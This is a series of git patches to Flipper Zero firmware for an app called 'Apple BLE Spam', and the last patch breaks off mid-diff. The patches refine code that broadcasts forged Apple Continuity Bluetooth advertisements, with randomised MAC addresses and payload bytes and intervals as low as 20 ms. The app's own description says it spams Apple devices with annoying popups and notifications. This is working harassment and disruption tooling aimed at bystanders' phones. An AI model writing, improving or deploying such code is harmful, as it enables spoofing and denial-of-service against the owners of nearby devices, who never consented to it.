From b138ee1eac634fb4a1230b524d6e8e6741624c73 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Wed, 6 Sep 2023 22:18:11 +0200 Subject: [PATCH 01/10] Capital hex values --nobuild --- .../external/apple_ble_spam/lib/continuity/continuity.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index 4796e1e56..995f7dcd0 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c @@ -36,8 +36,8 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { packet[i] = size - i - 1; // Packet Length i++; - packet[i++] = 0xff; // Packet Header - packet[i++] = 0x4c; // ... + packet[i++] = 0xFF; // Packet Header + packet[i++] = 0x4C; // ... packet[i++] = 0x00; // ... packet[i++] = msg->type; // Type packet[i] = size - i - 1; // Message Length From 2125f1fca48575b007b047ca7275d944d7404b75 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 00:32:02 +0200 Subject: [PATCH 02/10] New more streamlined custom ble adv api Thanks for the idea @xMasterX ! --- .../external/apple_ble_spam/apple_ble_spam.c | 46 +++++++++++++----- firmware/targets/f7/api_symbols.csv | 5 +- firmware/targets/f7/ble_glue/gap.c | 48 +++++-------------- firmware/targets/f7/ble_glue/gap.h | 2 - firmware/targets/f7/furi_hal/furi_hal_bt.c | 46 ++++++++++++++++-- .../targets/furi_hal_include/furi_hal_bt.h | 30 +++++++++++- 6 files changed, 120 insertions(+), 57 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index 3b4225f60..a173aad55 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -355,25 +355,45 @@ static int32_t adv_thread(void* ctx) { Payload* payload = state->payload; ContinuityMsg* msg = &payload->msg; ContinuityType type = msg->type; + while(state->advertising) { if(payload->random) { size_t random_i = rand() % randoms[type].count; memcpy(&msg->data, randoms[type].datas[random_i], sizeof(msg->data)); } continuity_generate_packet(msg, state->packet); - furi_hal_bt_set_custom_adv_data(state->packet, state->size); + furi_hal_bt_custom_adv_set(state->packet, state->size); furi_thread_flags_wait(true, FuriFlagWaitAny, state->delay); } + return 0; } +static void stop_adv(State* state) { + state->advertising = false; + furi_thread_flags_set(furi_thread_get_id(state->thread), true); + furi_thread_join(state->thread); + furi_hal_bt_custom_adv_stop(); +} + +static void start_adv(State* state) { + state->advertising = true; + furi_thread_start(state->thread); + uint8_t mac[GAP_MAC_ADDR_SIZE] = { + rand() % 256, + rand() % 256, + rand() % 256, + rand() % 256, + rand() % 256, + rand() % 256, + }; + furi_hal_bt_custom_adv_start(state->delay, state->delay, 0x00, mac, 0x1F); +} + static void toggle_adv(State* state, Payload* payload) { if(state->advertising) { - state->advertising = false; - furi_thread_flags_set(furi_thread_get_id(state->thread), true); - furi_thread_join(state->thread); + stop_adv(state); state->payload = NULL; - furi_hal_bt_set_custom_adv_data(NULL, 0); free(state->packet); state->packet = NULL; state->size = 0; @@ -381,8 +401,7 @@ static void toggle_adv(State* state, Payload* payload) { state->size = continuity_get_packet_size(payload->msg.type); state->packet = malloc(state->size); state->payload = payload; - state->advertising = true; - furi_thread_start(state->thread); + start_adv(state); } } @@ -464,36 +483,39 @@ int32_t apple_ble_spam(void* p) { furi_check(furi_message_queue_get(input_queue, &input, FuriWaitForever) == FuriStatusOk); Payload* payload = &payloads[state->index]; + bool advertising = state->advertising; switch(input.key) { case InputKeyOk: toggle_adv(state, payload); break; case InputKeyUp: if(state->delay < 5000) { + if(advertising) stop_adv(state); state->delay += 100; - furi_thread_flags_set(furi_thread_get_id(state->thread), true); + if(advertising) start_adv(state); } break; case InputKeyDown: if(state->delay > 100) { + if(advertising) stop_adv(state); state->delay -= 100; - furi_thread_flags_set(furi_thread_get_id(state->thread), true); + if(advertising) start_adv(state); } break; case InputKeyLeft: if(state->index > 0) { - if(state->advertising) toggle_adv(state, payload); + if(advertising) toggle_adv(state, payload); state->index--; } break; case InputKeyRight: if(state->index < COUNT_OF(payloads) - 1) { - if(state->advertising) toggle_adv(state, payload); + if(advertising) toggle_adv(state, payload); state->index++; } break; case InputKeyBack: - if(state->advertising) toggle_adv(state, payload); + if(advertising) toggle_adv(state, payload); running = false; break; default: diff --git a/firmware/targets/f7/api_symbols.csv b/firmware/targets/f7/api_symbols.csv index e9b53e916..4f29e357e 100644 --- a/firmware/targets/f7/api_symbols.csv +++ b/firmware/targets/f7/api_symbols.csv @@ -1075,6 +1075,9 @@ Function,+,furi_event_flag_wait,uint32_t,"FuriEventFlag*, uint32_t, uint32_t, ui Function,+,furi_get_tick,uint32_t, Function,+,furi_hal_bt_change_app,_Bool,"FuriHalBtProfile, GapEventCallback, void*" Function,+,furi_hal_bt_clear_white_list,_Bool, +Function,+,furi_hal_bt_custom_adv_set,_Bool,"const uint8_t*, size_t" +Function,+,furi_hal_bt_custom_adv_start,_Bool,"uint16_t, uint16_t, uint8_t, const uint8_t[( 6 )], uint8_t" +Function,+,furi_hal_bt_custom_adv_stop,_Bool, Function,+,furi_hal_bt_dump_state,void,FuriString* Function,+,furi_hal_bt_ensure_c2_mode,_Bool,BleGlueC2Mode Function,-,furi_hal_bt_get_conn_rssi,uint32_t,uint8_t* @@ -1117,7 +1120,6 @@ Function,+,furi_hal_bt_serial_set_rpc_status,void,FuriHalBtSerialRpcStatus Function,+,furi_hal_bt_serial_start,void, Function,+,furi_hal_bt_serial_stop,void, Function,+,furi_hal_bt_serial_tx,_Bool,"uint8_t*, uint16_t" -Function,+,furi_hal_bt_set_custom_adv_data,void,"const uint8_t*, size_t" Function,+,furi_hal_bt_set_key_storage_change_callback,void,"BleGlueKeyStorageChangedCallback, void*" Function,+,furi_hal_bt_set_profile_adv_name,void,"FuriHalBtProfile, const char[( 18 + 1 )]" Function,+,furi_hal_bt_set_profile_mac_addr,void,"FuriHalBtProfile, const uint8_t[( 6 )]" @@ -1705,7 +1707,6 @@ Function,-,gammaf_r,float,"float, int*" Function,-,gap_get_remote_conn_rssi,uint32_t,int8_t* Function,-,gap_get_state,GapState, Function,-,gap_init,_Bool,"GapConfig*, GapEventCallback, void*" -Function,-,gap_set_custom_adv_data,void,"size_t, const uint8_t*" Function,-,gap_start_advertising,void, Function,-,gap_stop_advertising,void, Function,-,gap_thread_stop,void, diff --git a/firmware/targets/f7/ble_glue/gap.c b/firmware/targets/f7/ble_glue/gap.c index 38e5520ab..27ab1ee40 100644 --- a/firmware/targets/f7/ble_glue/gap.c +++ b/firmware/targets/f7/ble_glue/gap.c @@ -37,9 +37,6 @@ typedef struct { FuriThread* thread; FuriMessageQueue* command_queue; bool enable_adv; - - size_t custom_adv_len; - const uint8_t* custom_adv_data; } Gap; typedef enum { @@ -434,34 +431,18 @@ static void gap_advertise_start(GapState new_state) { } } // Configure advertising - if(gap->custom_adv_data) { - // Custom adv logic from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ - static const uint16_t gap_appearance = 0x0000; //GAP_APPEARANCE_UNKNOWN - status = aci_gatt_update_char_value( - gap->service.gap_svc_handle, - gap->service.gap_svc_handle, - 0, - sizeof(gap_appearance), - (uint8_t*)&gap_appearance); - status = aci_gap_set_discoverable( - ADV_IND, min_interval, max_interval, CFG_IDENTITY_ADDRESS, 0, 0, NULL, 0, NULL, 0, 0); - status = aci_gap_delete_ad_type(AD_TYPE_FLAGS); - status = aci_gap_delete_ad_type(AD_TYPE_TX_POWER_LEVEL); - status = aci_gap_update_adv_data(gap->custom_adv_len, gap->custom_adv_data); - } else { - status = aci_gap_set_discoverable( - ADV_IND, - min_interval, - max_interval, - CFG_IDENTITY_ADDRESS, - 0, - strlen(gap->service.adv_name), - (uint8_t*)gap->service.adv_name, - gap->service.adv_svc_uuid_len, - gap->service.adv_svc_uuid, - 0, - 0); - } + status = aci_gap_set_discoverable( + ADV_IND, + min_interval, + max_interval, + CFG_IDENTITY_ADDRESS, + 0, + strlen(gap->service.adv_name), + (uint8_t*)gap->service.adv_name, + gap->service.adv_svc_uuid_len, + gap->service.adv_svc_uuid, + 0, + 0); if(status) { FURI_LOG_E(TAG, "set_discoverable failed %d", status); } else { @@ -581,11 +562,6 @@ uint32_t gap_get_remote_conn_rssi(int8_t* rssi) { return 0; } -void gap_set_custom_adv_data(size_t adv_len, const uint8_t* adv_data) { - gap->custom_adv_len = adv_len; - gap->custom_adv_data = adv_data; -} - GapState gap_get_state() { GapState state; if(gap) { diff --git a/firmware/targets/f7/ble_glue/gap.h b/firmware/targets/f7/ble_glue/gap.h index 721b4c778..7b317e06c 100644 --- a/firmware/targets/f7/ble_glue/gap.h +++ b/firmware/targets/f7/ble_glue/gap.h @@ -83,8 +83,6 @@ void gap_thread_stop(); uint32_t gap_get_remote_conn_rssi(int8_t* rssi); -void gap_set_custom_adv_data(size_t adv_len, const uint8_t* adv_data); - #ifdef __cplusplus } #endif diff --git a/firmware/targets/f7/furi_hal/furi_hal_bt.c b/firmware/targets/f7/furi_hal/furi_hal_bt.c index 83505fdb5..6a27b86e3 100644 --- a/firmware/targets/f7/furi_hal/furi_hal_bt.c +++ b/firmware/targets/f7/furi_hal/furi_hal_bt.c @@ -483,10 +483,48 @@ uint32_t furi_hal_bt_get_conn_rssi(uint8_t* rssi) { return since; } -void furi_hal_bt_set_custom_adv_data(const uint8_t* adv_data, size_t adv_len) { - gap_set_custom_adv_data(adv_len, adv_data); - furi_hal_bt_stop_advertising(); - furi_hal_bt_start_advertising(); +bool furi_hal_bt_custom_adv_set(const uint8_t* adv_data, size_t adv_len) { + tBleStatus status = aci_gap_additional_beacon_set_data(adv_len, adv_data); + if(status) { + FURI_LOG_E(TAG, "custom_adv_set failed %d", status); + return false; + } else { + FURI_LOG_I(TAG, "custom_adv_set success"); + return true; + } +} + +bool furi_hal_bt_custom_adv_start( + uint16_t min_interval, + uint16_t max_interval, + uint8_t mac_type, + const uint8_t mac_addr[GAP_MAC_ADDR_SIZE], + uint8_t power_amp_level) { + tBleStatus status = aci_gap_additional_beacon_start( + min_interval / 0.625, // Millis to gap time + max_interval / 0.625, // Millis to gap time + 0b00000111, // All 3 channels + mac_type, + mac_addr, + power_amp_level); + if(status) { + FURI_LOG_E(TAG, "custom_adv_start failed %d", status); + return false; + } else { + FURI_LOG_I(TAG, "custom_adv_start success"); + return true; + } +} + +bool furi_hal_bt_custom_adv_stop() { + tBleStatus status = aci_gap_additional_beacon_stop(); + if(status) { + FURI_LOG_E(TAG, "custom_adv_stop failed %d", status); + return false; + } else { + FURI_LOG_I(TAG, "custom_adv_stop success"); + return true; + } } void furi_hal_bt_reverse_mac_addr(uint8_t mac_addr[GAP_MAC_ADDR_SIZE]) { diff --git a/firmware/targets/furi_hal_include/furi_hal_bt.h b/firmware/targets/furi_hal_include/furi_hal_bt.h index ed7519b39..b7d4eae1a 100644 --- a/firmware/targets/furi_hal_include/furi_hal_bt.h +++ b/firmware/targets/furi_hal_include/furi_hal_bt.h @@ -251,7 +251,35 @@ const uint8_t* furi_hal_bt_get_profile_mac_addr(FuriHalBtProfile profile); uint32_t furi_hal_bt_get_conn_rssi(uint8_t* rssi); -void furi_hal_bt_set_custom_adv_data(const uint8_t* adv_data, size_t adv_len); +/** Set custom advertisement packet data + * @param[in] adv_data pointer to advertisement data + * @param[in] adv_len length of advertisement data + * + * @return true on success +*/ +bool furi_hal_bt_custom_adv_set(const uint8_t* adv_data, size_t adv_len); + +/** Start custom advertisement beacon + * @param[in] min_interval minimum advertisement interval (20 - 10240 ms) + * @param[in] max_interval maximum advertisement interval (20 - 10240 ms) + * @param[in] mac_type type of mac address (0x00 public, 0x01 static random) + * @param[in] mac_addr pointer to mac address + * @param[in] power_amp_level amplifier level (output dBm) (0x00 - 0x1F) + * + * @return true on success +*/ +bool furi_hal_bt_custom_adv_start( + uint16_t min_interval, + uint16_t max_interval, + uint8_t mac_type, + const uint8_t mac_addr[GAP_MAC_ADDR_SIZE], + uint8_t power_amp_level); + +/** Stop custom advertisement beacon + * + * @return true on success +*/ +bool furi_hal_bt_custom_adv_stop(); void furi_hal_bt_set_profile_pairing_method(FuriHalBtProfile profile, GapPairing pairing_method); From 2a3318c6275c813fc91c78e2904cd105ba1c0361 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 00:35:08 +0200 Subject: [PATCH 03/10] Preset values for delays, now minimum is 20ms --- .../external/apple_ble_spam/apple_ble_spam.c | 35 ++++++++++++++----- 1 file changed, 27 insertions(+), 8 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index a173aad55..f1fcb2f64 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -340,6 +340,25 @@ struct { ContinuityData** datas; } randoms[ContinuityTypeCount] = {0}; +size_t delays[] = { + 20, + 50, + 100, + 150, + 200, + 300, + 400, + 500, + 750, + 1000, + 1500, + 2000, + 2500, + 3000, + 4000, + 5000, +}; + typedef struct { bool advertising; size_t delay; @@ -363,7 +382,7 @@ static int32_t adv_thread(void* ctx) { } continuity_generate_packet(msg, state->packet); furi_hal_bt_custom_adv_set(state->packet, state->size); - furi_thread_flags_wait(true, FuriFlagWaitAny, state->delay); + furi_thread_flags_wait(true, FuriFlagWaitAny, delays[state->delay]); } return 0; @@ -387,7 +406,8 @@ static void start_adv(State* state) { rand() % 256, rand() % 256, }; - furi_hal_bt_custom_adv_start(state->delay, state->delay, 0x00, mac, 0x1F); + size_t delay = delays[state->delay]; + furi_hal_bt_custom_adv_start(delay, delay, 0x00, mac, 0x1F); } static void toggle_adv(State* state, Payload* payload) { @@ -414,7 +434,7 @@ static void draw_callback(Canvas* canvas, void* ctx) { canvas_draw_str(canvas, 14, 12, "Apple BLE Spam"); canvas_set_font(canvas, FontBatteryPercent); char delay[14]; - snprintf(delay, sizeof(delay), "%ims", state->delay); + snprintf(delay, sizeof(delay), "%ims", delays[state->delay]); canvas_draw_str_aligned(canvas, 116, 12, AlignRight, AlignBottom, delay); canvas_draw_icon(canvas, 119, 6, &I_SmallArrowUp_3x5); canvas_draw_icon(canvas, 119, 10, &I_SmallArrowDown_3x5); @@ -464,7 +484,6 @@ int32_t apple_ble_spam(void* p) { } State* state = malloc(sizeof(State)); - state->delay = 500; state->thread = furi_thread_alloc(); furi_thread_set_callback(state->thread, adv_thread); furi_thread_set_context(state->thread, state); @@ -489,16 +508,16 @@ int32_t apple_ble_spam(void* p) { toggle_adv(state, payload); break; case InputKeyUp: - if(state->delay < 5000) { + if(state->delay < COUNT_OF(delays) - 1) { if(advertising) stop_adv(state); - state->delay += 100; + state->delay++; if(advertising) start_adv(state); } break; case InputKeyDown: - if(state->delay > 100) { + if(state->delay > 0) { if(advertising) stop_adv(state); - state->delay -= 100; + state->delay--; if(advertising) start_adv(state); } break; From 45a0d5d1be69ecec693ad101179d91a482d0e309 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 00:37:15 +0200 Subject: [PATCH 04/10] Remember bt state after ble stop (#380) --- applications/external/apple_ble_spam/apple_ble_spam.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index f1fcb2f64..83af0846f 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -360,6 +360,7 @@ size_t delays[] = { }; typedef struct { + bool resume; bool advertising; size_t delay; size_t size; @@ -413,6 +414,7 @@ static void start_adv(State* state) { static void toggle_adv(State* state, Payload* payload) { if(state->advertising) { stop_adv(state); + if(state->resume) furi_hal_bt_start_advertising(); state->payload = NULL; free(state->packet); state->packet = NULL; @@ -421,6 +423,8 @@ static void toggle_adv(State* state, Payload* payload) { state->size = continuity_get_packet_size(payload->msg.type); state->packet = malloc(state->size); state->payload = payload; + state->resume = furi_hal_bt_is_active(); + furi_hal_bt_stop_advertising(); start_adv(state); } } From e737ebb3f630ac26bc7ba13b12664c40f9568b5b Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 01:51:00 +0200 Subject: [PATCH 05/10] Rework random mac handling --- .../external/apple_ble_spam/apple_ble_spam.c | 13 ++++--------- 1 file changed, 4 insertions(+), 9 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index 83af0846f..d37d895a6 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -1,6 +1,7 @@ #include #include #include +#include #include #include "apple_ble_spam_icons.h" @@ -367,6 +368,7 @@ typedef struct { uint8_t* packet; Payload* payload; FuriThread* thread; + uint8_t mac[GAP_MAC_ADDR_SIZE]; size_t index; } State; @@ -399,16 +401,8 @@ static void stop_adv(State* state) { static void start_adv(State* state) { state->advertising = true; furi_thread_start(state->thread); - uint8_t mac[GAP_MAC_ADDR_SIZE] = { - rand() % 256, - rand() % 256, - rand() % 256, - rand() % 256, - rand() % 256, - rand() % 256, - }; size_t delay = delays[state->delay]; - furi_hal_bt_custom_adv_start(delay, delay, 0x00, mac, 0x1F); + furi_hal_bt_custom_adv_start(delay, delay, 0x00, state->mac, 0x1F); } static void toggle_adv(State* state, Payload* payload) { @@ -423,6 +417,7 @@ static void toggle_adv(State* state, Payload* payload) { state->size = continuity_get_packet_size(payload->msg.type); state->packet = malloc(state->size); state->payload = payload; + furi_hal_random_fill_buf(state->mac, sizeof(state->mac)); state->resume = furi_hal_bt_is_active(); furi_hal_bt_stop_advertising(); start_adv(state); From d6d66e0d4218717a6b33c481fb2d64918ff9d497 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 01:53:38 +0200 Subject: [PATCH 06/10] Replace size_t with appropriately sized integers --- .../external/apple_ble_spam/apple_ble_spam.c | 20 +++++++++---------- .../lib/continuity/continuity.c | 8 ++++---- .../lib/continuity/continuity.h | 2 +- 3 files changed, 15 insertions(+), 15 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index d37d895a6..73c80a247 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -337,11 +337,11 @@ static Payload payloads[] = { }; struct { - size_t count; + uint8_t count; ContinuityData** datas; } randoms[ContinuityTypeCount] = {0}; -size_t delays[] = { +uint16_t delays[] = { 20, 50, 100, @@ -363,13 +363,13 @@ size_t delays[] = { typedef struct { bool resume; bool advertising; - size_t delay; - size_t size; + uint8_t delay; + uint8_t size; uint8_t* packet; Payload* payload; FuriThread* thread; uint8_t mac[GAP_MAC_ADDR_SIZE]; - size_t index; + uint8_t index; } State; static int32_t adv_thread(void* ctx) { @@ -380,7 +380,7 @@ static int32_t adv_thread(void* ctx) { while(state->advertising) { if(payload->random) { - size_t random_i = rand() % randoms[type].count; + uint8_t random_i = rand() % randoms[type].count; memcpy(&msg->data, randoms[type].datas[random_i], sizeof(msg->data)); } continuity_generate_packet(msg, state->packet); @@ -401,7 +401,7 @@ static void stop_adv(State* state) { static void start_adv(State* state) { state->advertising = true; furi_thread_start(state->thread); - size_t delay = delays[state->delay]; + uint16_t delay = delays[state->delay]; furi_hal_bt_custom_adv_start(delay, delay, 0x00, state->mac, 0x1F); } @@ -466,15 +466,15 @@ static void input_callback(InputEvent* input, void* ctx) { int32_t apple_ble_spam(void* p) { UNUSED(p); - for(size_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { + for(uint8_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { if(payloads[payload_i].random) continue; randoms[payloads[payload_i].msg.type].count++; } for(ContinuityType type = 0; type < ContinuityTypeCount; type++) { if(!randoms[type].count) continue; randoms[type].datas = malloc(sizeof(ContinuityData*) * randoms[type].count); - size_t random_i = 0; - for(size_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { + uint8_t random_i = 0; + for(uint8_t payload_i = 0; payload_i < COUNT_OF(payloads); payload_i++) { if(payloads[payload_i].random) continue; if(payloads[payload_i].msg.type == type) { randoms[type].datas[random_i++] = &payloads[payload_i].msg.data; diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index 995f7dcd0..631de4e3f 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c @@ -18,7 +18,7 @@ const char* continuity_get_type_name(ContinuityType type) { return continuity_type_names[type]; } -static size_t continuity_packet_sizes[ContinuityTypeCount] = { +static uint8_t continuity_packet_sizes[ContinuityTypeCount] = { [ContinuityTypeAirDrop] = 24, [ContinuityTypeProximityPair] = 31, [ContinuityTypeAirplayTarget] = 12, @@ -26,13 +26,13 @@ static size_t continuity_packet_sizes[ContinuityTypeCount] = { [ContinuityTypeTetheringSource] = 12, [ContinuityTypeNearbyAction] = 11, }; -size_t continuity_get_packet_size(ContinuityType type) { +uint8_t continuity_get_packet_size(ContinuityType type) { return continuity_packet_sizes[type]; } void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { - size_t size = continuity_get_packet_size(msg->type); - size_t i = 0; + uint8_t size = continuity_get_packet_size(msg->type); + uint8_t i = 0; packet[i] = size - i - 1; // Packet Length i++; diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.h b/applications/external/apple_ble_spam/lib/continuity/continuity.h index 773f88d9e..e1789f16f 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.h +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.h @@ -44,6 +44,6 @@ typedef struct { const char* continuity_get_type_name(ContinuityType type); -size_t continuity_get_packet_size(ContinuityType type); +uint8_t continuity_get_packet_size(ContinuityType type); void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet); From 0d195264677c512942f12a4c3b4eaadaa1c2e268 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 02:02:43 +0200 Subject: [PATCH 07/10] Faster ble packet randomization --- .../lib/continuity/continuity.c | 26 ++++--------------- 1 file changed, 5 insertions(+), 21 deletions(-) diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index 631de4e3f..99513f379 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c @@ -34,8 +34,7 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { uint8_t size = continuity_get_packet_size(msg->type); uint8_t i = 0; - packet[i] = size - i - 1; // Packet Length - i++; + packet[i++] = size - 1; // Packet Length packet[i++] = 0xFF; // Packet Header packet[i++] = 0x4C; // ... packet[i++] = 0x00; // ... @@ -75,22 +74,8 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { packet[i++] = (rand() % 256); // Lid Open Counter packet[i++] = 0x00; // Device Color packet[i++] = 0x00; - packet[i++] = (rand() % 256); // Encrypted Payload - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... + furi_hal_random_fill_buf(&packet[i], 16); // Encrypted Payload + i += 16; break; case ContinuityTypeAirplayTarget: @@ -133,9 +118,8 @@ void continuity_generate_packet(const ContinuityMsg* msg, uint8_t* packet) { if(packet[i] == 0xBF && rand() % 2) packet[i]++; // Ugly hack to shift 0xBF-0xC0 for spam i++; packet[i++] = msg->data.nearby_action.type; - packet[i++] = (rand() % 256); // Authentication Tag - packet[i++] = (rand() % 256); // ... - packet[i++] = (rand() % 256); // ... + furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag + i += 3; break; default: From 881f7c5e55ae31a1e90f1ef79692a4996738cef8 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 02:19:29 +0200 Subject: [PATCH 08/10] Update credits --nobuild --- applications/external/apple_ble_spam/apple_ble_spam.c | 4 +++- applications/external/apple_ble_spam/application.fam | 2 +- .../external/apple_ble_spam/lib/continuity/continuity.c | 4 +++- .../external/apple_ble_spam/lib/continuity/continuity.h | 4 +++- 4 files changed, 10 insertions(+), 4 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c b/applications/external/apple_ble_spam/apple_ble_spam.c index 73c80a247..cfdb5fe95 100644 --- a/applications/external/apple_ble_spam/apple_ble_spam.c +++ b/applications/external/apple_ble_spam/apple_ble_spam.c @@ -15,9 +15,11 @@ typedef struct { } Payload; // Hacked together by @Willy-JL +// Custom adv logic by @Willy-JL and @xMasterX +// Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ -// Custom adv logic and Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ +// Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ static Payload payloads[] = { #if false diff --git a/applications/external/apple_ble_spam/application.fam b/applications/external/apple_ble_spam/application.fam index a76a181ee..55cd762fe 100644 --- a/applications/external/apple_ble_spam/application.fam +++ b/applications/external/apple_ble_spam/application.fam @@ -13,7 +13,7 @@ App( name="continuity", ), ], - fap_author="@Willy-JL & @techryptic", + fap_author="@Willy-JL", # Plus research from @ECTO-1A @xMasterX and @techryptic fap_version="1.0", fap_description="Spam Apple devices with annoying popups and notifications via BLE packets", ) diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.c b/applications/external/apple_ble_spam/lib/continuity/continuity.c index 99513f379..852fa8ccc 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.c +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.c @@ -2,9 +2,11 @@ #include // Hacked together by @Willy-JL +// Custom adv logic by @Willy-JL and @xMasterX +// Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ -// Custom adv logic and Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ +// Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ static const char* continuity_type_names[ContinuityTypeCount] = { [ContinuityTypeAirDrop] = "AirDrop", diff --git a/applications/external/apple_ble_spam/lib/continuity/continuity.h b/applications/external/apple_ble_spam/lib/continuity/continuity.h index e1789f16f..98c3df67d 100644 --- a/applications/external/apple_ble_spam/lib/continuity/continuity.h +++ b/applications/external/apple_ble_spam/lib/continuity/continuity.h @@ -4,9 +4,11 @@ #include // Hacked together by @Willy-JL +// Custom adv logic by @Willy-JL and @xMasterX +// Extensive testing and research on behavior and parameters by @Willy-JL and @ECTO-1A // Structures docs and Nearby Action IDs from https://github.com/furiousMAC/continuity/ // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/ -// Custom adv logic and Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ +// Airtag ID from https://techryptic.github.io/2023/09/01/Annoying-Apple-Fans/ typedef enum { ContinuityTypeAirDrop = 0x05, From 7e9f0657a4468ccd0bba52d6d5c1d6d0f427fb38 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 02:33:14 +0200 Subject: [PATCH 09/10] ./fBt FoRmAt FoRmAt_pY --nobuild --- applications/external/apple_ble_spam/application.fam | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/applications/external/apple_ble_spam/application.fam b/applications/external/apple_ble_spam/application.fam index 55cd762fe..985c03fd1 100644 --- a/applications/external/apple_ble_spam/application.fam +++ b/applications/external/apple_ble_spam/application.fam @@ -13,7 +13,7 @@ App( name="continuity", ), ], - fap_author="@Willy-JL", # Plus research from @ECTO-1A @xMasterX and @techryptic + fap_author="@Willy-JL", # Plus research from @ECTO-1A @xMasterX and @techryptic fap_version="1.0", fap_description="Spam Apple devices with annoying popups and notifications via BLE packets", ) From bf55e9b5a9c4676cc5b9a772c8090eb4a39be54f Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Thu, 7 Sep 2023 02:53:15 +0200 Subject: [PATCH 10/10] Random mac breaks "dismiss active actions" so poof --nobuild --- applications/external/apple_ble_spam/apple_ble_spam.c | 8 -------- 1 file changed, 8 deletions(-) diff --git a/applications/external/apple_ble_spam/apple_ble_spam.c 